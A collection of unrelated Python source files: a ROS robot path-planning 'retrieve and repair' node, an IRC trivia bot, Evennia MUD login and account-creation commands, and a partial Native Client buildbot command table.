    and replans ("repairs") any invalid sections before returning it.
    Also provides a service for managing (storing/deleting) library paths.
    """

    def __init__(self):
        # Retrieve ROS parameters and configuration and construct various objects.
        self.robot_name = rospy.get_param("robot_name")
        self.planner_config_name = rospy.get_param("planner_config_name")
        self.current_joint_names = []
        self.current_group_name = ""
        self.plan_trajectory_wrapper = PlanTrajectoryWrapper("rr", int(rospy.get_param("~num_rr_planners")))
        self.invalid_section_wrapper = InvalidSectionWrapper()
        self.path_library = PathLibrary(rospy.get_param("~path_library_dir"), rospy.get_param("step_size"), node_size=int(rospy.get_param("~path_library_path_node_size")), sg_node_size=int(rospy.get_param("~path_library_sg_node_size")), dtw_dist=float(rospy.get_param("~dtw_distance")))
        self.num_paths_checked = int(rospy.get_param("~num_paths_to_collision_check"))
        self.stop_lock = threading.Lock()
        # Start in the "stopped" state until an action goal arrives.
        self.stop = True
        self.rr_server = actionlib.SimpleActionServer(RR_NODE_NAME, RRAction, execute_cb=self._retrieve_repair, auto_start=False)
        self.rr_server.start()
        self.stop_rr_subscriber = rospy.Subscriber(STOP_RR_NAME, StopPlanning, self._stop_rr_planner)
        self.stop_rr_planner_publisher = rospy.Publisher(STOP_PLANNER_NAME, StopPlanning, queue_size=10)
        self.manage_library_service = rospy.Service(MANAGE_LIBRARY, ManagePathLibrary, self._do_manage_action)
        self.stats_pub = rospy.Publisher("rr_stats", RRStats, queue_size=10)
        self.repaired_sections_lock = threading.Lock()
        self.repaired_sections = []
        self.working_lock = threading.Lock() #to ensure that node is not doing RR and doing a library management action at the same time

        #if draw_points is True, then display points in rviz
        self.draw_points = rospy.get_param("draw_points")
        if self.draw_points:
            self.draw_points_wrapper = DrawPointsWrapper()

    def _set_repaired_section(self, index, section):
        """
          After you have done the path planning to repair a section, store
            the repaired path section.

          Args:
            index (int): the index corresponding to the section being repaired.
            section (path, list of list of float): A path to store.
        """
        with self.repaired_sections_lock:
            self.repaired_sections[index] = section

    def _call_planner(self, start, goal, planning_time):
        """
          Calls a standard planner to plan between two points with an allowed
            planning time.

          Args:
            start (list of float): A joint configuration corresponding to the
              start position of the path.
            goal (list of float): The joint configuration corresponding to the
              goal position for the path.
            planning_time (float): Maximum allowed time to spend planning, in
              seconds.

          Returns:
            path: A list of joint configurations corresponding to the planned
              path, or None if planning was stopped or failed.
        """
        ret = None
        planner_number = self.plan_trajectory_wrapper.acquire_planner()
        if not self._need_to_stop():
            ret = self.plan_trajectory_wrapper.plan_trajectory(start, goal, planner_number, self.current_joint_names, self.current_group_name, planning_time, self.planner_config_name)
        self.plan_trajectory_wrapper.release_planner(planner_number)
        return ret

    def _repair_thread(self, index, start, goal, start_index, goal_index, planning_time):
        """
          Handles repairing a portion of the path.
          All that this function really does is to plan from scratch between
            the start and goal configurations and then store the planned path
            in the appropriate places and draws either the repaired path or, if
            the repair fails, the start and goal.

          Args:
            index (int): The index to pass to _set_repaired_section(),
              corresponding to which of the invalid sections of the path we are
              repairing.
            start (list of float): The start joint configuration to use.
            goal (list of float): The goal joint configuration to use.
            start_index (int): The index in the overall path corresponding to
              start. Only used for debugging info.
            goal_index (int): The index in the overall path corresponding to
              goal. Only used for debugging info.
            planning_time (float): Maximum allowed time to spend planning, in
              seconds.
        """
        repaired_path = self._call_planner(start, goal, planning_time)
        # NOTE: the original code had the failure-drawing branch under an
        # outer "else" of "if self.draw_points:", making it unreachable;
        # both branches are meant to be guarded by draw_points alone.
        if self.draw_points:
            if repaired_path is not None and len(repaired_path) > 0:
                rospy.loginfo("RR action server: got repaired section with start = %s, goal = %s" % (repaired_path[0], repaired_path[-1]))
                self.draw_points_wrapper.draw_points(repaired_path, self.current_group_name, "repaired"+str(start_index)+"_"+str(goal_index), DrawPointsWrapper.ANGLES, DrawPointsWrapper.GREENBLUE, 1.0, 0.01)
            else:
                rospy.loginfo("RR action server: path repair for section (%i, %i) failed, start = %s, goal = %s" % (start_index, goal_index, start, goal))
                self.draw_points_wrapper.draw_points([start, goal], self.current_group_name, "failed_repair"+str(start_index)+"_"+str(goal_index), DrawPointsWrapper.ANGLES, DrawPointsWrapper.GREENBLUE, 1.0)
        if self._need_to_stop():
            self._set_repaired_section(index, None)
        else:
            self._set_repaired_section(index, repaired_path)

    def _need_to_stop(self):
        """Thread-safe read of the stop flag."""
        with self.stop_lock:
            return self.stop

    def _set_stop_value(self, val):
        """Thread-safe write of the stop flag."""
        with self.stop_lock:
            self.stop = val

    def do_retrieved_path_drawing(self, projected, retrieved, invalid):
        """
          Draws the points from the various paths involved in the planning
            in different colors in different namespaces.
          All of the arguments are lists of joint configurations, where each
            joint configuration is a list of joint angles.
          The only distinction between the different arguments being passed in
            are which color the points in question are being drawn in.
          Uses the DrawPointsWrapper to draw the points.

          Args:
            projected (list of list of float): List of points to draw as
              projected between the library path and the actual start/goal
              position. Will be drawn in blue.
            retrieved (list of list of float): The path retrieved straight
              from the path library. Will be drawn in white.
            invalid (list of list of float): List of points which were invalid.
              Will be drawn in red.
        """
        if len(projected) > 0:
            if self.draw_points:
                self.draw_points_wrapper.draw_points(retrieved, self.current_group_name, "retrieved", DrawPointsWrapper.ANGLES, DrawPointsWrapper.WHITE, 0.1)
                # Only the projected points outside the retrieved span are drawn
                # in the "projection" namespace.
                projectionDisplay = projected[:projected.index(retrieved[0])]+projected[projected.index(retrieved[-1])+1:]
                self.draw_points_wrapper.draw_points(projectionDisplay, self.current_group_name, "projection", DrawPointsWrapper.ANGLES, DrawPointsWrapper.BLUE, 0.2)
                invalidDisplay = []
                for invSec in invalid:
                    invalidDisplay += projected[invSec[0]+1:invSec[-1]]
                self.draw_points_wrapper.draw_points(invalidDisplay, self.current_group_name, "invalid", DrawPointsWrapper.ANGLES, DrawPointsWrapper.RED, 0.2)

    def _retrieve_repair(self, action_goal):
        """
          Callback which performs the full Retrieve and Repair for the path.
          Publishes timing statistics and sets the action result when done.
        """
        self.working_lock.acquire()
        self.start_time = time.time()
        self.stats_msg = RRStats()
        self._set_stop_value(False)
        if self.draw_points:
            self.draw_points_wrapper.clear_points()
        rospy.loginfo("RR action server: RR got an action goal")
        s, g = action_goal.start, action_goal.goal
        res = RRResult()
        res.status.status = res.status.FAILURE
        self.current_joint_names = action_goal.joint_names
        self.current_group_name = action_goal.group_name
        projected, retrieved, invalid = [], [], []
        repair_state = STATE_RETRIEVE

        self.stats_msg.init_time = time.time() - self.start_time

        # Go through the retrieve, repair, and return stages of the planning.
        # The while loop should only ever go through 3 iterations, one for each
        #   stage.
        while not self._need_to_stop() and repair_state != STATE_FINISHED:
            if repair_state == STATE_RETRIEVE:
                start_retrieve = time.time()
                projected, retrieved, invalid = self.path_library.retrieve_path(s, g, self.num_paths_checked, self.robot_name, self.current_group_name, self.current_joint_names)
                self.stats_msg.retrieve_time.append(time.time() - start_retrieve)
                if len(projected) == 0:
                    rospy.loginfo("RR action server: got an empty path for retrieve state")
                    repair_state = STATE_FINISHED
                else:
                    start_draw = time.time()
                    if self.draw_points:
                        self.do_retrieved_path_drawing(projected, retrieved, invalid)
                    self.stats_msg.draw_time.append(time.time() - start_draw)
                    repair_state = STATE_REPAIR
            elif repair_state == STATE_REPAIR:
                start_repair = time.time()
                repaired = self._path_repair(projected, action_goal.allowed_planning_time.to_sec(), invalid_sections=invalid)
                self.stats_msg.repair_time.append(time.time() - start_repair)
                if repaired is None:
                    rospy.loginfo("RR action server: path repair didn't finish")
                    repair_state = STATE_FINISHED
                else:
                    repair_state = STATE_RETURN_PATH
            elif repair_state == STATE_RETURN_PATH:
                start_return = time.time()
                res.status.status = res.status.SUCCESS
                res.retrieved_path = [Float64Array(p) for p in retrieved]
                res.repaired_path = [Float64Array(p) for p in repaired]
                rospy.loginfo("RR action server: returning a path")
                repair_state = STATE_FINISHED
                self.stats_msg.return_time = time.time() - start_return
        # Report which stage we were stopped in, if any.
        if repair_state == STATE_RETRIEVE:
            rospy.loginfo("RR action server: stopped before it retrieved a path")
        elif repair_state == STATE_REPAIR:
            rospy.loginfo("RR action server: stopped before it could repair a retrieved path")
        elif repair_state == STATE_RETURN_PATH:
            rospy.loginfo("RR action server: stopped before it could return a repaired path")
        self.rr_server.set_succeeded(res)
        self.stats_msg.total_time = time.time() - self.start_time
        self.stats_pub.publish(self.stats_msg)
        self.working_lock.release()

    def _path_repair(self, original_path, planning_time, invalid_sections=None, use_parallel_repairing=True):
        """
          Goes through each invalid section in a path and calls a planner to
            repair it, with the potential for multi-threading. Returns the
            repaired path.

          Args:
            original_path (path): The original path which needs repairing.
            planning_time (float): The maximum allowed planning time for
              each repair, in seconds.
            invalid_sections (list of pairs of indicies): The pairs of indicies
              describing the invalid sections. If None, then the invalid
              sections will be computed by this function.
            use_parallel_repairing (bool): Whether or not to use multi-threading.

          Returns:
            path: The repaired path, or None if repair failed or was stopped.
        """
        zeros_tuple = tuple([0 for i in xrange(len(self.current_joint_names))])
        rospy.loginfo("RR action server: got path with %d points" % len(original_path))

        if invalid_sections is None:
            invalid_sections = self.invalid_section_wrapper.getInvalidSectionsForPath(original_path, self.current_group_name)
        rospy.loginfo("RR action server: invalid sections: %s" % (str(invalid_sections)))
        if len(invalid_sections) > 0:
            # The endpoints themselves must be valid or nothing can be planned.
            if invalid_sections[0][0] == -1:
                rospy.loginfo("RR action server: Start is not a valid state...nothing can be done")
                return None
            if invalid_sections[-1][1] == len(original_path):
                rospy.loginfo("RR action server: Goal is not a valid state...nothing can be done")
                return None

            if use_parallel_repairing:
                #multi-threaded repairing
                self.repaired_sections = [None for i in xrange(len(invalid_sections))]
                #each thread replans an invalid section
                threadList = []
                for i, sec in enumerate(invalid_sections):
                    th = threading.Thread(target=self._repair_thread, args=(i, original_path[sec[0]], original_path[sec[-1]], sec[0], sec[-1], planning_time))
                    threadList.append(th)
                    th.start()
                for th in threadList:
                    th.join()
                #once all threads return, then the repaired sections can be combined
                for item in self.repaired_sections:
                    if item is None:
                        rospy.loginfo("RR action server: RR node was stopped during repair or repair failed")
                        return None
                #replace invalid sections with replanned sections
                new_path = original_path[0:invalid_sections[0][0]]
                for i in xrange(len(invalid_sections)):
                    new_path += self.repaired_sections[i]
                    if i+1 < len(invalid_sections):
                        new_path += original_path[invalid_sections[i][1]+1:invalid_sections[i+1][0]]
                new_path += original_path[invalid_sections[-1][1]+1:]
                self.repaired_sections = [] #reset repaired_sections
            else:
                #single-threaded repairing
                rospy.loginfo("RR action server: Got invalid sections: %s" % str(invalid_sections))
                new_path = original_path[0:invalid_sections[0][0]]
                for i in xrange(len(invalid_sections)):
                    if not self._need_to_stop():
                        #start_invalid and end_invalid must correspond to valid states when passed to the planner
                        start_invalid, end_invalid = invalid_sections[i]
                        rospy.loginfo("RR action server: Requesting path to replace from %d to %d" % (start_invalid, end_invalid))
                        # BUGFIX: the original call omitted the required
                        # planning_time argument, which made this branch
                        # raise a TypeError.
                        repairedSection = self._call_planner(original_path[start_invalid], original_path[end_invalid], planning_time)
                        if repairedSection is None:
                            rospy.loginfo("RR action server: RR section repair was stopped or failed")
                            return None
                        rospy.loginfo("RR action server: Planner returned a trajectory of %d points for %d to %d" % (len(repairedSection), start_invalid, end_invalid))
                        new_path += repairedSection
                        if i+1 < len(invalid_sections):
                            new_path += original_path[end_invalid+1:invalid_sections[i+1][0]]
                    else:
                        rospy.loginfo("RR action server: RR was stopped while it was repairing the retrieved path")
                        return None
                new_path += original_path[invalid_sections[-1][1]+1:]
            rospy.loginfo("RR action server: Trajectory after replan has %d points" % len(new_path))
        else:
            new_path = original_path

        rospy.loginfo("RR action server: new trajectory has %i points" % (len(new_path)))
        return new_path

    def _stop_rr_planner(self, msg):
        """Stop callback: halt current RR processing and forward the stop
        message to the repair planners."""
        self._set_stop_value(True)
        rospy.loginfo("RR action server: RR node got a stop message")
        self.stop_rr_planner_publisher.publish(msg)

    def _do_manage_action(self, request):
        """
          Processes a ManagePathLibraryRequest as part of the ManagePathLibrary
            service. Basically, either stores a path in the library or deletes it.
        """
        response = ManagePathLibraryResponse()
        response.result = response.FAILURE
        if request.robot_name == "" or len(request.joint_names) == 0:
            rospy.logerr("RR action server: robot name or joint names were not provided")
            return response

        self.working_lock.acquire()
        if request.action == request.ACTION_STORE:
            rospy.loginfo("RR action server: got a path to store in path library")
            if len(request.path_to_store) > 0:
                new_path = [p.positions for p in request.path_to_store]

                if len(request.retrieved_path) == 0:
                    #PFS won so just store the path
                    store_path_result = self.path_library.store_path(new_path, request.robot_name, request.joint_names)
                else:
                    store_path_result = self.path_library.store_path(new_path, request.robot_name, request.joint_names, [p.positions for p in request.retrieved_path])
                response.result = response.SUCCESS
                response.path_stored, response.num_library_paths = store_path_result
            else:
                response.message = "Path to store had no points"
        elif request.action == request.ACTION_DELETE_PATH:
            rospy.loginfo("RR action server: got a request to delete path %i in the path library" % (request.delete_id))
            if self.path_library.delete_path_by_id(request.delete_id, request.robot_name, request.joint_names):
                response.result = response.SUCCESS
            else:
                response.message = "No path in the library had id %i" % (request.delete_id)
        elif request.action == request.ACTION_DELETE_LIBRARY:
            rospy.loginfo("RR action server: got a request to delete library corresponding to robot %s and joints %s" % (request.robot_name, request.joint_names))
            if self.path_library.delete_library(request.robot_name, request.joint_names):
                response.result = response.SUCCESS
            else:
                # BUGFIX: the original left the %s placeholders unformatted.
                response.message = "No library corresponding to robot %s and joint names %s exists" % (request.robot_name, request.joint_names)
        else:
            rospy.logerr("RR action server: manage path library request did not have a valid action set")
        self.working_lock.release()
        return response

if __name__ == "__main__":
    try:
        # Initialize the ROS node, construct the action server, and block in
        # spin(); all real work happens in ROS callbacks on RRNode.
        rospy.init_node("rr_node")
        RRNode()
        rospy.loginfo("Retrieve-repair: ready")
        rospy.spin()
    except rospy.ROSInterruptException:
        # Normal shutdown path (e.g. Ctrl-C / ROS shutdown) — exit quietly.
        pass

#!/usr/bin/env python
# Bootstrap Django settings before importing any models.
from django.core.management import setup_environ
import settings
setup_environ(settings)

import socket
from trivia.models import *

# Single TCP connection to the IRC server, shared by all helpers below
# for the lifetime of the script.
irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
irc.connect((settings.IRC_SERVER, settings.IRC_PORT))

def send(msg):
   irc.send(msg + "\r\n")
   print "{SENT} " + msg
   return

def msg(user, msg):
   """Deliver a PRIVMSG to the given user or channel."""
   send("PRIVMSG " + user + " :" + msg)

def processline(line):
   """Parse a single raw IRC line and react to it.

   Answers server PINGs and the "!questions" channel command; anything
   else is silently ignored.
   """
   head, sep, trailing = line.partition(' :')
   args = head.split(' ')
   if sep:
      args.append(trailing)

   # Keep-alive: reply to the server's PING with a matching PONG.
   if args[0] == "PING":
      send("PONG :" + args[1])
      return

   # Channel command handling; short messages simply lack args[3].
   try:
      if args[3] == "!questions":
         msg(args[2], str(Question.objects.all()))
   except IndexError:
      pass
   

# Register with the server and join the configured channels.
send("USER " + (settings.IRC_NICKNAME + " ")*4)
send("NICK " + settings.IRC_NICKNAME)
for channel in settings.IRC_CHANNELS:
   send("JOIN " + channel)

# Main receive loop. A single recv() may deliver several IRC messages
# separated by CRLF, so split on "\r\n" and process each one.
# BUGFIX: the original used line.split() (any whitespace), which shredded
# each IRC line into individual words before handing them to processline.
while True:
   line = irc.recv(1024).rstrip()
   if "\r\n" in line:
      for l in line.split("\r\n"):
         processline(l)
      continue
   processline(line)





"""
Commands that are available from the connect screen.
"""
import re
import traceback
from django.conf import settings
from src.players.models import PlayerDB
from src.objects.models import ObjectDB
from src.server.models import ServerConfig
from src.comms.models import Channel

from src.utils import create, logger, utils, ansi
from src.commands.default.muxcommand import MuxCommand
from src.commands.cmdhandler import CMD_LOGINSTART

# limit symbol import for API.
# BUGFIX: the original tuple listed "CmdUnconnectedConnect" and
# "CmdUnconnectedCreate", names not defined in this module (the classes
# are named Connect and Create), so "from <module> import *" would raise
# AttributeError.
__all__ = ("Connect", "Create", "CmdUnconnectedQuit", "CmdUnconnectedLook", "CmdUnconnectedHelp", "Magic")

CONNECTION_SCREEN_MODULE = settings.CONNECTION_SCREEN_MODULE
# Build the connection screen once at import time; fall back to an error
# string if the configured module cannot be loaded or yields no text.
CONNECTION_SCREEN = ""
try:
    CONNECTION_SCREEN = ansi.parse_ansi(utils.string_from_module(CONNECTION_SCREEN_MODULE))
except Exception:
    pass
if not CONNECTION_SCREEN:
    CONNECTION_SCREEN = "\nEvennia: Error in CONNECTION_SCREEN MODULE (randomly picked connection screen variable is not a string). \nEnter 'help' for aid."

class Magic(MuxCommand):
    """
    Hidden command for the web client's magic cookie authenticator.

    Treats self.lhs as the player name and self.rhs as the cookie value;
    on an exact name match and matching db.magic_cookie, logs the session
    in (unless the name/IP is banned).
    """
    key = "magic"
    def func(self):
        session = self.caller
        # player_search returns a list of matches; require exactly one,
        # and an exact (case-insensitive) name match rather than a fuzzy one.
        player = PlayerDB.objects.player_search(self.lhs)
        if len(player) != 1:
            player = None
        else:
            player = player[0]
            if player.name.lower() != self.lhs.lower():
                player=None
        pswd = None
        if player:
            # NOTE(review): plain equality check against the stored cookie;
            # presumably db.magic_cookie is set by the web client — confirm.
            pswd = self.rhs == player.db.magic_cookie

        if not (player and pswd):
            # No playername or password match
            session.msg("Could not verify Magic Cookie. Please email the server administrator for assistance.")
            return

        # Check IP and/or name bans
        bans = ServerConfig.objects.conf("server_bans")
        if bans and (any(tup[0]==player.name for tup in bans)
                     or
                     any(tup[2].match(session.address[0]) for tup in bans if tup[2])):
            # this is a banned IP or name!
            string = "{rYou have been banned and cannot continue from here."
            string += "\nIf you feel this ban is in error, please email an admin.{x"
            session.msg(string)
            session.execute_cmd("quit")
            return

        # All checks passed — log the session in.
        session.sessionhandler.login(session, player)

class Connect(MuxCommand):
    """
    Connect to the game.

    Usage (at login screen):
      connect playername password
      connect "player name" "pass word"

    Use the create command to first create an account before logging in.

    If you have spaces in your name, enclose it in quotes.
    """
    key = "connect"
    aliases = ["conn", "con", "co"]
    locks = "cmd:all()" # not really needed

    def func(self):
        """
        Uses the Django admin api. Note that unlogged-in commands
        have a unique position in that their func() receives
        a session object instead of a source_object like all
        other types of logged-in commands (this is because
        there is no object yet before the player has logged in)
        """

        session = self.caller
        args = self.args
        # extract quoted parts
        parts = [part.strip() for part in re.split(r"\"|\'", args) if part.strip()]
        if len(parts) == 1:
            # this was (hopefully) due to no quotes being found
            parts = parts[0].split(None, 1)
        if len(parts) != 2:
            session.msg("\n\r Usage (without <>): connect <name> <password>")
            return
        playername, password = parts

        # Match account name and check password.
        # player_search returns a list; require exactly one match and an
        # exact (case-insensitive) name match, not a fuzzy one.
        player = PlayerDB.objects.player_search(playername)
        if len(player) != 1:
            player = None
        else:
            player = player[0]
            if player.name.lower() != playername.lower():
                player=None
        pswd = None
        if player:
            pswd = player.check_password(password)

        if not (player and pswd):
            # No playername or password match
            string = "Wrong login information given.\nIf you have spaces in your name or "
            string += "password, don't forget to enclose it in quotes. Also capitalization matters."
            string += "\nIf you are new you should first create a new account "
            string += "using the 'create' command."
            session.msg(string)
            return

        # Check IP and/or name bans
        bans = ServerConfig.objects.conf("server_bans")
        if bans and (any(tup[0]==player.name for tup in bans)
                     or
                     any(tup[2].match(session.address[0]) for tup in bans if tup[2])):
            # this is a banned IP or name!
            string = "{rYou have been banned and cannot continue from here."
            string += "\nIf you feel this ban is in error, please email an admin.{x"
            session.msg(string)
            session.execute_cmd("quit")
            return

        # actually do the login. This will call all other hooks:
        #   session.at_init()
        #   if character:
        #      at_first_login()  # only once
        #      at_pre_login()
        #   player.at_post_login()     - calls look if no character is set
        #   character.at_post_login()  - this calls look command by default
        session.sessionhandler.login(session, player)

class Create(MuxCommand):
    """
    Create a new account.

    Usage (at login screen):
      create <playername> <password>
      create "player name" "pass word"

    This creates a new player account.

    If you have spaces in your name, enclose it in quotes.
    """
    key = "create"
    aliases = ["cre", "cr"]
    locks = "cmd:all()"

    def func(self):
        "Do checks and create account"

        session = self.caller
        args = self.args.strip()

        # extract quoted parts
        parts = [part.strip() for part in re.split(r"\"|\'", args) if part.strip()]
        if len(parts) == 1:
            # this was (hopefully) due to no quotes being found
            parts = parts[0].split(None, 1)
        if len(parts) != 2:
            string = "\n Usage (without <>): create <name> <password>"
            string += "\nIf <name> or <password> contains spaces, enclose it in quotes."
            session.msg(string)
            return
        playername, password = parts
        # SECURITY: the debug print that used to live here echoed the
        # plaintext password to the server's stdout/log; removed.

        # sanity checks
        if not re.findall('^[\w. @+-]+$', playername) or not (0 < len(playername) <= 30):
            # this echoes the restrictions made by django's auth module (except not
            # allowing spaces, for convenience of logging in).
            string = "\n\r Playername can max be 30 characters or fewer. Letters, spaces, digits and @/./+/-/_ only."
            session.msg(string)
            return
        # strip excessive spaces in playername
        playername = re.sub(r"\s+", " ", playername).strip()
        if PlayerDB.objects.filter(user__username__iexact=playername) or PlayerDB.objects.filter(username__iexact=playername):
            # player already exists (we also ignore capitalization here)
            session.msg("Sorry, there is already a player with the name '%s'." % playername)
            return
        if not re.findall('^[\w. @+-]+$', password) or not (3 < len(password)):
            # (typo "characers" fixed in the message below)
            string = "\n\r Password should be longer than 3 characters. Letters, spaces, digits and @\.\+\-\_ only."
            string += "\nFor best security, make it longer than 8 characters. You can also use a phrase of"
            string += "\nmany words if you enclose the password in quotes."
            session.msg(string)
            return

        # everything's ok. Create the new player account.
        try:
            default_home = ObjectDB.objects.get_id(settings.CHARACTER_DEFAULT_HOME)

            typeclass = settings.BASE_CHARACTER_TYPECLASS
            permissions = settings.PERMISSION_PLAYER_DEFAULT

            try:
                new_character = create.create_player(playername, None, password,
                                                     permissions=permissions,
                                                     character_typeclass=typeclass,
                                                     character_location=default_home,
                                                     character_home=default_home)
            except Exception:
                # BUGFIX: the original message contained a bare %s with no
                # formatting argument; include the actual traceback.
                session.msg("There was an error creating the default Character/Player:\n%s\n If this problem persists, contact an admin." % traceback.format_exc())
                return
            new_player = new_character.player

            # This needs to be called so the engine knows this player is logging in for the first time.
            # (so it knows to call the right hooks during login later)
            utils.init_new_player(new_player)

            # join the new player to the public channel
            pchanneldef = settings.CHANNEL_PUBLIC
            if pchanneldef:
                pchannel = Channel.objects.get_channel(pchanneldef[0])
                if not pchannel.connect_to(new_player):
                    string = "New player '%s' could not connect to public channel!" % new_player.key
                    logger.log_errmsg(string)

            # allow only the character itself and the player to puppet this character (and Immortals).
            new_character.locks.add("puppet:id(%i) or pid(%i) or perm(Immortals) or pperm(Immortals)" %
                                    (new_character.id, new_player.id))

            # If no description is set, set a default description
            if not new_character.db.desc:
                new_character.db.desc = "This is a Player."

            # tell the caller everything went well.
            string = "A new account '%s' was created. Welcome!"
            if " " in playername:
                string += "\n\nYou can now log in with the command 'connect \"%s\" <your password>'."
            else:
                string += "\n\nYou can now log with the command 'connect %s <your password>'."
            session.msg(string % (playername, playername))

        except Exception:
            # We are in the middle between logged in and -not, so we have to handle tracebacks
            # ourselves at this point. If we don't, we won't see any errors at all.
            string = "%s\nThis is a bug. Please e-mail an admin if the problem persists."
            session.msg(string % (traceback.format_exc()))
            logger.log_errmsg(traceback.format_exc())

class CmdUnconnectedQuit(MuxCommand):
    """
    We maintain a different version of the quit command
    here for unconnected players for the sake of simplicity. The logged in
    version is a bit more complicated.
    """
    key = "quit"
    aliases = ["q", "qu"]
    locks = "cmd:all()"

    def func(self):
        """Say goodbye and close this session's connection."""
        caller = self.caller
        caller.msg("Good bye! Disconnecting ...")
        caller.session_disconnect()

class CmdUnconnectedLook(MuxCommand):
    """
    This is an unconnected version of the look command for simplicity.

    This is called by the server and kicks everything in gear.
    All it does is display the connect screen.
    """
    key = CMD_LOGINSTART
    aliases = ["look", "l"]
    locks = "cmd:all()"

    def func(self):
        """Send the connection screen to the not-yet-logged-in session."""
        caller = self.caller
        caller.msg(CONNECTION_SCREEN)

class CmdUnconnectedHelp(MuxCommand):
    """
    This is an unconnected version of the help command,
    for simplicity. It shows a pane of info.
    """
    key = "help"
    aliases = ["h", "?"]
    locks = "cmd:all()"

    def func(self):
        "Shows help"

        # NOTE: the {w...{n markers are in-game color codes and the whole
        # literal is sent verbatim to the session, so it must not be
        # reflowed, translated or re-indented.
        string = \
            """
You are not yet logged into the game. Commands available at this point:
  {wcreate, connect, look, help, quit{n

To login to the system, you need to do one of the following:

{w1){n If you have no previous account, you need to use the 'create'
   command.

     {wcreate Anna c67jHL8p{n

   Note that if you use spaces in your name, you have to enclose in quotes.

     {wcreate "Anna the Barbarian"  c67jHL8p{n

   It's always a good idea (not only here, but everywhere on the net)
   to not use a regular word for your password. Make it longer than
   6 characters or write a passphrase.

{w2){n If you have an account already, either because you just created
   one in {w1){n above or you are returning, use the 'connect' command:

     {wconnect Anna c67jHL8p{n

   (Again, if there are spaces in the name you have to enclose it in quotes).
   This should log you in. Run {whelp{n again once you're logged in
   to get more aid. Hope you enjoy your stay!

You can use the {wlook{n command if you want to see the connect screen again.
"""
        self.caller.msg(string)

#!/usr/bin/python
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

import json
import os
import subprocess
import sys

sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import pynacl.platform

# Executables used to compose the per-bot command lines in BOT_ASSIGNMENT.
python = sys.executable  # the interpreter currently running this script
bash = '/bin/bash'
echo = 'echo'  # bots mapped to plain 'echo ...' are effectively disabled


# Maps a buildbot builder name (from $BUILDBOT_BUILDERNAME) to the shell
# command line that builder should run.  Backslash paths are Windows batch
# invocations; forward-slash paths run via bash or python.  Additional
# standard builder/trybot entries are generated programmatically below.
BOT_ASSIGNMENT = {
    ######################################################################
    # Buildbots.
    ######################################################################
    'xp-newlib-opt':
        python + ' buildbot\\buildbot_standard.py opt 32 newlib --no-gyp',
    'xp-glibc-opt':
        python + ' buildbot\\buildbot_standard.py opt 32 glibc --no-gyp',

    'xp-bare-newlib-opt':
        python + ' buildbot\\buildbot_standard.py opt 32 newlib --no-gyp',
    'xp-bare-glibc-opt':
        python + ' buildbot\\buildbot_standard.py opt 32 glibc --no-gyp',

    'precise-64-validator-opt':
        python + ' buildbot/buildbot_standard.py opt 64 glibc --validator',

    # Clang.
    'precise_64-newlib-dbg-clang':
        python + ' buildbot/buildbot_standard.py dbg 64 newlib --clang',
    'mac10.7-newlib-dbg-clang':
        python + ' buildbot/buildbot_standard.py dbg 32 newlib --clang',

    # ASan.
    'precise_64-newlib-dbg-asan':
        python + ' buildbot/buildbot_standard.py opt 64 newlib --asan',
    'mac10.7-newlib-dbg-asan':
        python + ' buildbot/buildbot_standard.py opt 32 newlib --asan',

    # PNaCl.
    'oneiric_32-newlib-arm_hw-pnacl-panda-dbg':
        bash + ' buildbot/buildbot_pnacl.sh mode-buildbot-arm-hw-dbg',
    'oneiric_32-newlib-arm_hw-pnacl-panda-opt':
        bash + ' buildbot/buildbot_pnacl.sh mode-buildbot-arm-hw-opt',
    'precise_64-newlib-arm_qemu-pnacl-dbg':
        bash + ' buildbot/buildbot_pnacl.sh mode-buildbot-arm-dbg',
    'precise_64-newlib-arm_qemu-pnacl-opt':
        bash + ' buildbot/buildbot_pnacl.sh mode-buildbot-arm-opt',
    'precise_64-newlib-x86_32-pnacl':
        python + ' buildbot/buildbot_pnacl.py opt 32 pnacl',
    'precise_64-newlib-x86_64-pnacl':
        python + ' buildbot/buildbot_pnacl.py opt 64 pnacl',
    'mac10.8-newlib-opt-pnacl':
        python + ' buildbot/buildbot_pnacl.py opt 32 pnacl',
    'win7-64-newlib-opt-pnacl':
        python + ' buildbot/buildbot_pnacl.py opt 64 pnacl',
    'precise_64-newlib-mips-pnacl':
        echo + ' "TODO(mseaborn): add mips"',
    # PNaCl Spec
    'precise_64-newlib-arm_qemu-pnacl-buildonly-spec':
        bash + ' buildbot/buildbot_spec2k.sh pnacl-arm-buildonly',
    'oneiric_32-newlib-arm_hw-pnacl-panda-spec':
        bash + ' buildbot/buildbot_spec2k.sh pnacl-arm-hw',
    'lucid_64-newlib-x86_32-pnacl-spec':
        bash + ' buildbot/buildbot_spec2k.sh pnacl-x8632',
    'lucid_64-newlib-x86_64-pnacl-spec':
        bash + ' buildbot/buildbot_spec2k.sh pnacl-x8664',
    # NaCl Spec
    'lucid_64-newlib-x86_32-spec':
        bash + ' buildbot/buildbot_spec2k.sh nacl-x8632',
    'lucid_64-newlib-x86_64-spec':
        bash + ' buildbot/buildbot_spec2k.sh nacl-x8664',

    # Valgrind bots.
    'precise-64-newlib-dbg-valgrind':
        echo + ' "Valgrind bots are disabled: see '
            'https://code.google.com/p/nativeclient/issues/detail?id=3158"',
    'precise-64-glibc-dbg-valgrind':
        echo + ' "Valgrind bots are disabled: see '
            'https://code.google.com/p/nativeclient/issues/detail?id=3158"',
    # Coverage.
    'mac10.6-newlib-coverage':
         python + (' buildbot/buildbot_standard.py '
                   'coverage 64 newlib --coverage'),
    'precise-64-32-newlib-coverage':
         python + (' buildbot/buildbot_standard.py '
                   'coverage 32 newlib --coverage'),
    'precise-64-64-newlib-coverage':
         python + (' buildbot/buildbot_standard.py '
                   'coverage 64 newlib --coverage'),
    'xp-newlib-coverage':
         python + (' buildbot/buildbot_standard.py '
                   'coverage 32 newlib --coverage'),

    ######################################################################
    # Trybots.
    ######################################################################
    'nacl-precise64_validator_opt':
        python + ' buildbot/buildbot_standard.py opt 64 glibc --validator',
    'nacl-precise64_newlib_dbg_valgrind':
        bash + ' buildbot/buildbot_valgrind.sh newlib',
    'nacl-precise64_glibc_dbg_valgrind':
        bash + ' buildbot/buildbot_valgrind.sh glibc',
    # Coverage trybots.
    'nacl-mac10.6-newlib-coverage':
         python + (' buildbot/buildbot_standard.py '
                   'coverage 64 newlib --coverage'),
    'nacl-precise-64-32-newlib-coverage':
         python + (' buildbot/buildbot_standard.py '
                   'coverage 32 newlib --coverage'),
